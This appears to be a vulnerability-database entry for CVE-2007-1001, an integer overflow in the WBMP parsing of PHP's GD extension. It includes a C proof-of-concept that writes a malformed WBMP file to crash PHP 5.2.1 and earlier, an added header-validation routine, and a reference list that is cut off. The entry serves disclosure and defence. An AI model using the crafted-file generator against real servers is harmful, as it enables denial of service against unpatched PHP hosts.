Mac OS X PHP Implementation Attack Vulnerability

Vulnerability ID: 1112650
Vulnerability type: Numeric error
Published: 2007-04-07
Updated: 2007-08-01
CVE ID: CVE-2007-1001
CNNVD-ID: CNNVD-200704-086
Platform: PHP
CVSS score: 6.8
|Vulnerability source
https://www.exploit-db.com/exploits/29823
https://www.securityfocus.com/bid/23357
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-086
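|Vulnerability details
Mac OS X is the operating system used by Apple's family of computers. The PHP implementation in Apple Mac OS X contains multiple vulnerabilities that may lead to various attacks.
|Exploit (EXP)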
source: http://www.securityfocus.com/bid/23357/info

PHP's GD extension is prone to two integer-overflow vulnerabilities because it fails to ensure that integer values aren't overrun.

Successfully exploiting these issues allows attackers to crash the affected application, potentially denying service to legitimate users. Due to the nature of the issues, code execution may also be possible, but this has not been confirmed.

PHP 5.2.1 and prior versions are vulnerable. 

#define BUFSIZE 1000000

#include <stdio.h>

int main()
{
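      int c;
      /* static: keeps the 1 MB buffer off the stack and zero-initialised */
      static char buf[BUFSIZE];

      /* binary mode so the bytes are written unmodified */
      FILE *fp = fopen("test.wbmp","wb");
      if (fp == NULL) {
            perror("fopen");
            return 1;
      }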

      //write header
      c = 0;
      fputc(c,fp);
      fputc(c,fp);

      //write width = 2^32 / 4 + 1
      c = 0x84;
      fputc(c,fp);
      c = 0x80;
      fputc(c,fp);
      fputc(c,fp);
      fputc(c,fp);
      c = 0x01;
      fputc(c,fp);

      //write height = 4
      c = 0x04;
      fputc(c,fp);

      //write some data to cause overflow
      fwrite(buf,sizeof(buf),1,fp);

      fclose(fp);
      return 0;
}
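
A dimension check of the kind the advisory says was missing, as an added example (not code from PHP, GD or the original advisory): it decodes the WBMP multi-byte width and height and rejects a header whose pixel-buffer size would not fit in a signed 32-bit value. The function names, result codes and the 4-byte-per-pixel cell size are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

enum { WBMP_OK = 0, WBMP_MALFORMED = -1, WBMP_OVERFLOW = -2 }; /* example's own codes */

/* Decode a WBMP multi-byte integer: 7 value bits per byte, top bit = "more follows". */
static int read_mbi(const uint8_t *p, size_t len, size_t *pos, uint32_t *out)
{
    uint64_t v = 0;
    uint8_t b;
    do {
        if (*pos >= len) return WBMP_MALFORMED;   /* input ended mid-integer */
        b = p[(*pos)++];
        v = (v << 7) | (b & 0x7f);
        if (v > UINT32_MAX)
            return WBMP_OVERFLOW;                 /* field itself exceeds 32 bits */
    } while (b & 0x80);
    *out = (uint32_t)v;
    return WBMP_OK;
}

/* Check a type-0 WBMP header before anything is allocated from its dimensions. */
int wbmp_check_header(const uint8_t *p, size_t len, uint32_t *w, uint32_t *h)
{
    const uint64_t cell = 4;                /* assumption: 4 bytes stored per pixel */
    size_t pos = 2;
    int rc;
    if (len < 2 || p[0] != 0 || p[1] != 0)
        return WBMP_MALFORMED;              /* type and fixed-header bytes must be 0 */
    if ((rc = read_mbi(p, len, &pos, w)) != WBMP_OK) return rc;
    if ((rc = read_mbi(p, len, &pos, h)) != WBMP_OK) return rc;
    if (*w == 0 || *h == 0) return WBMP_MALFORMED;
    /* Dividing instead of multiplying keeps the check itself from wrapping. */
    if (*w > (uint64_t)INT32_MAX / cell / *h) return WBMP_OVERFLOW;
    return WBMP_OK;
}

/* poc_hdr: header bytes the generator above writes (width 0x40000001, height 4).
 * good_hdr: constructed benign header, 16 x 16 pixels. */
static const uint8_t poc_hdr[]  = { 0x00, 0x00, 0x84, 0x80, 0x80, 0x80, 0x01, 0x04 };
static const uint8_t good_hdr[] = { 0x00, 0x00, 0x10, 0x10 };

int main(void)
{
    uint32_t w = 0, h = 0;
    printf("poc:  %d\n", wbmp_check_header(poc_hdr, sizeof poc_hdr, &w, &h));
    printf("good: %d\n", wbmp_check_header(good_hdr, sizeof good_hdr, &w, &h));
    return 0;
}
```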
|Affected products
Turbolinux Turbolinux Server 10.0 x86 Turbolinux Turbolinux Server 10.0 Turbolinux Turbolinux Desktop 10.0 Turbolinux Turbolinux 10 F... TurboLinux Personal TurboLinux Mu
|References

Source: VUPEN
Name: ADV-2007-1269
Link: http://www.frsirt.com/english/advisories/2007/1269
Source: issues.rpath.com
Link: https://issues.rpath.com/browse/RPL-1268
Source: XF
Name: php-gd-overflow(33453)
Link: http://xforce.iss.net/xforce/xfdb/33453
Source: BID
Name: 23357
Link: http://www.securityfocus.com/bid/23357
Source: BUGTRAQ
Name: 20070418 rPSA-2007-0073-1 php php-mysql php-pgsql
Link: http://www.securityfocus.com/archive/1/archive/1/466166/100/0/threaded
Source: BUGTRAQ
Name: 20070407 PHP <= 5.2.1 wbmp file handling integer overflow
Link: http://www.securityfocus.com/archive/1/archive/1/464957/100/0/threaded
Source: REDHAT
Name: RHSA-2007:0162
Link: http://www.redhat.com/support/errata/RHSA-2007-0162.html
Source: REDHAT
Name: RHSA-2007:0153
Link: http://www.redhat.com/support/errata/RHSA-2007-0153.html
Source: SECUNIA
Name: 24965
Link: http://secunia.com/advisories/24965
Source: SECUNIA
Name: 24945
Link: http://secunia.com/advisories/24945
Source: SECUNIA
Name: 24924
Link: http://secunia.com/advisories/24924
Source: SECUNIA
Name: 24814
Link: http://secunia.com/advisories/24814
Source: REDHAT
Name: RHSA-2007:0155
Link: http://